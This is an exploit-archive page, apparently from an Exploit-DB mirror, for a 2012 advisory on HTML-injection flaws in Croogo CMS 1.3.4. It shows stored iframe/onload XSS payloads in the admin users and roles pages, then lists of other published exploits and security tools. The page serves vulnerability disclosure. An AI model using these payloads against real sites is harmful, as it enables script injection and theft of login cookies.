Menu

Search for hundreds of thousands of exploits

"Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities"

Author

Exploit author

"Chokri Ben Achor"

Platform

Exploit platform

perl

Release date

Exploit published date

2012-04-29

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
source: https://www.securityfocus.com/bid/53287/info

Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Croogo CMS 1.3.4 is vulnerable; other versions may also be affected. 

URL: http://www.example.com/croogo/admin/users

<td>"><iframe src="a" onload='alert("VL")' <<="" td=""> <td>"><iframe src=a onload=alert("VL")
<</td> <td>asdasd () aol com</td>

<td><a href="/croogo/admin/users/edit/2">Edit</a> <a href="/croogo/admin/users/delete/2/token:
c68c0779f65f5657a8d17c28daebcc7a15fe51e3"

onclick="return confirm('Are you sure?');">Delete</a></td></tr>


URL: http://www.example.com/croogo/admin/roles

<tr class="striped"><td>4</td> <td>"><iframe src="a" onload='alert("VL")'
<<="" td=""> <td>"><iframe src=a onload=alert("VL") <</td> <td>
<a href="/croogo/admin/roles/edit/4">Edit</a> <a href="/croogo/admin/roles/delete
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-04-02 "VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal" webapps perl LiquidWorm
2018-02-28 "Routers2 2.24 - Cross-Site Scripting" webapps perl "Lorenzo Di Fuccia"
2018-01-21 "OTRS 5.0.x/6.0.x - Remote Command Execution" webapps perl Bæln0rn
2016-03-16 "AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection" webapps perl BrianWGray
2015-05-26 "ClickHeat 1.13+ - Remote Command Execution" webapps perl "Calum Hutton"
2012-04-29 "Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities" webapps perl "Chokri Ben Achor"
2012-04-27 "MySQLDumper 1.24.4 - 'install.php?language' Traversal Arbitrary File Access" webapps perl AkaStep
2004-01-12 "MetaDot < 5.6.5.4b5 - Multiple Vulnerabilities" webapps perl "GulfTech Security"
Release Date Title Type Platform Author
2013-05-27 "Barracuda SSL VPN 680 - 'returnTo' Open Redirection" remote hardware "Chokri Ben Achor"
2012-08-06 "Joomla! Component com_photo - Multiple SQL Injections" webapps php "Chokri Ben Achor"
2012-04-29 "Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities" webapps perl "Chokri Ben Achor"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.